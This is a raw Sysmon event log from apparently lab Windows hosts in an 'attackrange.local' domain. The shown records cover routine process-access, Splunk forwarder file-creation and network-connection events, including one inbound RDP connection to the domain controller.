07:56:42.224{466BC892-02AF-60E8-0D00-00000000CF01}900376C:\Windows\system32\svchost.exe{466BC892-32D6-60E8-840B-00000000CF01}7376C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+f526|c:\windows\system32\rpcss.dll+121ba|c:\windows\system32\rpcss.dll+740c|C:\Windows\System32\RPCRT4.dll+64b8c|C:\Windows\System32\RPCRT4.dll+64979|C:\Windows\System32\RPCRT4.dll+64793|C:\Windows\System32\RPCRT4.dll+3f7d4|C:\Windows\System32\RPCRT4.dll+3fc51|C:\Windows\System32\RPCRT4.dll+1c39d|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 
10341000x80000000000000001050458Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:42.224{466BC892-02AF-60E8-0D00-00000000CF01}900376C:\Windows\system32\svchost.exe{466BC892-32D6-60E8-840B-00000000CF01}7376C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+f526|c:\windows\system32\rpcss.dll+121ba|c:\windows\system32\rpcss.dll+740c|C:\Windows\System32\RPCRT4.dll+64b8c|C:\Windows\System32\RPCRT4.dll+64979|C:\Windows\System32\RPCRT4.dll+64793|C:\Windows\System32\RPCRT4.dll+3f7d4|C:\Windows\System32\RPCRT4.dll+3fc51|C:\Windows\System32\RPCRT4.dll+1c39d|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050457Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:56:42.224{466BC892-02AF-60E8-0D00-00000000CF01}900376C:\Windows\system32\svchost.exe{466BC892-32D6-60E8-840B-00000000CF01}7376C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+f526|c:\windows\system32\rpcss.dll+121ba|c:\windows\system32\rpcss.dll+740c|C:\Windows\System32\RPCRT4.dll+64b8c|C:\Windows\System32\RPCRT4.dll+64979|C:\Windows\System32\RPCRT4.dll+64793|C:\Windows\System32\RPCRT4.dll+3f7d4|C:\Windows\System32\RPCRT4.dll+3fc51|C:\Windows\System32\RPCRT4.dll+1c39d|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050456Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:42.224{466BC892-02AF-60E8-0D00-00000000CF01}900376C:\Windows\system32\svchost.exe{466BC892-32D6-60E8-840B-00000000CF01}7376C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+f526|c:\windows\system32\rpcss.dll+121ba|c:\windows\system32\rpcss.dll+740c|C:\Windows\System32\RPCRT4.dll+64b8c|C:\Windows\System32\RPCRT4.dll+64979|C:\Windows\System32\RPCRT4.dll+64793|C:\Windows\System32\RPCRT4.dll+3f7d4|C:\Windows\System32\RPCRT4.dll+3fc51|C:\Windows\System32\RPCRT4.dll+1c39d|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 
10341000x80000000000000001050455Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:42.224{466BC892-02AF-60E8-0D00-00000000CF01}900376C:\Windows\system32\svchost.exe{466BC892-32D6-60E8-840B-00000000CF01}7376C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+f526|c:\windows\system32\rpcss.dll+121ba|c:\windows\system32\rpcss.dll+740c|C:\Windows\System32\RPCRT4.dll+64b8c|C:\Windows\System32\RPCRT4.dll+64979|C:\Windows\System32\RPCRT4.dll+64793|C:\Windows\System32\RPCRT4.dll+3f7d4|C:\Windows\System32\RPCRT4.dll+3fc51|C:\Windows\System32\RPCRT4.dll+1c39d|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050454Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:56:42.224{466BC892-02AF-60E8-0D00-00000000CF01}900376C:\Windows\system32\svchost.exe{466BC892-32D6-60E8-840B-00000000CF01}7376C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+f526|c:\windows\system32\rpcss.dll+121ba|c:\windows\system32\rpcss.dll+740c|C:\Windows\System32\RPCRT4.dll+64b8c|C:\Windows\System32\RPCRT4.dll+64979|C:\Windows\System32\RPCRT4.dll+64793|C:\Windows\System32\RPCRT4.dll+3f7d4|C:\Windows\System32\RPCRT4.dll+3fc51|C:\Windows\System32\RPCRT4.dll+1c39d|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050453Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:42.224{466BC892-02AF-60E8-0D00-00000000CF01}900376C:\Windows\system32\svchost.exe{466BC892-32D6-60E8-840B-00000000CF01}7376C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+f526|c:\windows\system32\rpcss.dll+121ba|c:\windows\system32\rpcss.dll+740c|C:\Windows\System32\RPCRT4.dll+64b8c|C:\Windows\System32\RPCRT4.dll+64979|C:\Windows\System32\RPCRT4.dll+64793|C:\Windows\System32\RPCRT4.dll+3f7d4|C:\Windows\System32\RPCRT4.dll+3fc51|C:\Windows\System32\RPCRT4.dll+1c39d|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 
10341000x80000000000000001050452Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:42.224{466BC892-02AF-60E8-0D00-00000000CF01}900376C:\Windows\system32\svchost.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+f526|c:\windows\system32\rpcss.dll+121ba|c:\windows\system32\rpcss.dll+740c|C:\Windows\System32\RPCRT4.dll+64b8c|C:\Windows\System32\RPCRT4.dll+64979|C:\Windows\System32\RPCRT4.dll+64793|C:\Windows\System32\RPCRT4.dll+3f7d4|C:\Windows\System32\RPCRT4.dll+3fc51|C:\Windows\System32\RPCRT4.dll+1c39d|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050451Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:56:42.224{466BC892-02AF-60E8-0D00-00000000CF01}900376C:\Windows\system32\svchost.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+f526|c:\windows\system32\rpcss.dll+121ba|c:\windows\system32\rpcss.dll+740c|C:\Windows\System32\RPCRT4.dll+64b8c|C:\Windows\System32\RPCRT4.dll+64979|C:\Windows\System32\RPCRT4.dll+64793|C:\Windows\System32\RPCRT4.dll+3f7d4|C:\Windows\System32\RPCRT4.dll+3fc51|C:\Windows\System32\RPCRT4.dll+1c39d|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001050468Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:43.870{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BABD8486E9396CE8313D28792F35326B,SHA256=E5A7763BAAE5F422F23D67A0D22A5DED49D347C5003D2087CCD00F147320E40C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000808394Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:56:43.304{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E5AF7436957B1423A7B04644528F1C88,SHA256=9B10F996C7DB764411F7FF7E8BD57E8A806DF78A79E66877DEE903EF93E61267,IMPHASH=00000000000000000000000000000000falsetrue 
23542300x80000000000000001050470Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:44.888{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FDF4F28F2E38C35DE44A3EDB811DD6E1,SHA256=3373A601E3994E9FDD9EB74EB0555CADFF9671C8525C8D53FE32A389BECE0D26,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000808395Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:56:44.351{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DF040CFB6FD1B403499DA75DCBBB7AC4,SHA256=F1211F505222D443E1435FF2F7AB443490B4557356FE351843F1F2DDF0160047,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001050469Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:35.681{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local51088-false10.0.1.12-8000- 23542300x80000000000000001050471Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:45.905{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F833798983FFE1B127C986BB97A9B3E0,SHA256=D0176E85DDE2F5B980D44A3F18413117CEF8206D058C729535FC84D3DA22272F,IMPHASH=00000000000000000000000000000000falsetrue 
23542300x8000000000000000808396Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:56:45.351{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6C107074E1C5605B1489C7DC72D884D8,SHA256=18B9A08E67314EA7804DC35D6E5FB752FB0BC5D18DD617FA480A5B66F29E55F2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050474Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:46.920{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8EE55F16DD9F21C305A653B5F47BBCAF,SHA256=6538AE4C0E1BA727BC237CF0461E9F0094DF84CA0373A4F68F7B3EC756428C39,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000808397Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:56:46.398{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DCA574634A54870C81B0C839525ABDD6,SHA256=262209744733EC979B7EFCC1A93C24665F38BF18F7ECD506206264DC75F4AB8B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050473Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:46.851{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=F6FF0F6EA5396604E86557A3C273834A,SHA256=959065E72C86E272C7DD0D3AFAEABAE960750208888BBC33957F6C0E11CD7280,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050472Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:46.851{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=AE9C360C83C9126B9BFC86031716A60C,SHA256=18DADC74AA04B7592855A849188B0E9784B2FCBD048E4EB6D5C55BB3809F4678,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050476Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:47.935{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6B4EC11C2051B5B49938C7D74FC6B517,SHA256=6DF486592D83543F8C80952078C5FD66A00BEF98679D1786837432519061E2D2,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000808399Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:56:46.218{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57323-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000808398Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:56:47.413{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=824DE9D7BB7F117FCB42E55AB19E7B97,SHA256=CBF3EBF5809950DE4F8605116E288BAFA7358B62966B1BDFED2F538BF7EB61CE,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001050475Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:38.807{466BC892-02AF-60E8-0F00-00000000CF01}360C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse191.96.168.180-61088-false10.0.1.14win-dc-890.attackrange.local3389ms-wbt-server 23542300x80000000000000001050477Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:48.966{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A78AAEB51A1AC911A319AA048F98B729,SHA256=EC87C3257DF59136439A826224D44A1935DF3C6939A61E01DEA38427874C1E9C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000808400Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:56:48.429{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1D8772A367244B2E3457355D61497CD9,SHA256=AF436A24C3B436B1230E7937A4F231F20AAF37DF8E4129F04DD2FB143F5A918F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050479Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:49.983{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=823AC3E179285AFBC14812CFFBC35288,SHA256=5A0F4C165E5786A54DB58B37AF59C26C9F78401C225FE184DC83F7CEA1260693,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000808401Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:56:49.476{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2EEDF9C786190D76667737AE95BCBE68,SHA256=7663186A186DFBA801CB90B6806B40351197DFDBCB04467FC84DC83C2022F2CE,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001050478Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:41.657{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local51089-false10.0.1.12-8000- 23542300x8000000000000000808402Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:56:50.476{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=70192CA4FEC7454AE2F8232933C0E195,SHA256=92C2F4731609F266B4EC0AC95F9145B06747AC0A79669BE3D580253AF27328D5,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001050496Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:50.964{466BC892-02BD-60E8-3500-00000000CF01}32483268C:\Windows\system32\conhost.exe{466BC892-F5C2-60EB-5E7D-00000000CF01}7148C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050495Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:50.948{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050494Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:56:50.948{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050493Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:50.948{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050492Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:56:50.948{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050491Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:50.948{466BC892-02AD-60E8-0500-00000000CF01}408524C:\Windows\system32\csrss.exe{466BC892-F5C2-60EB-5E7D-00000000CF01}7148C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001050490Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:50.948{466BC892-02BC-60E8-2A00-00000000CF01}29283252C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{466BC892-F5C2-60EB-5E7D-00000000CF01}7148C:\Program 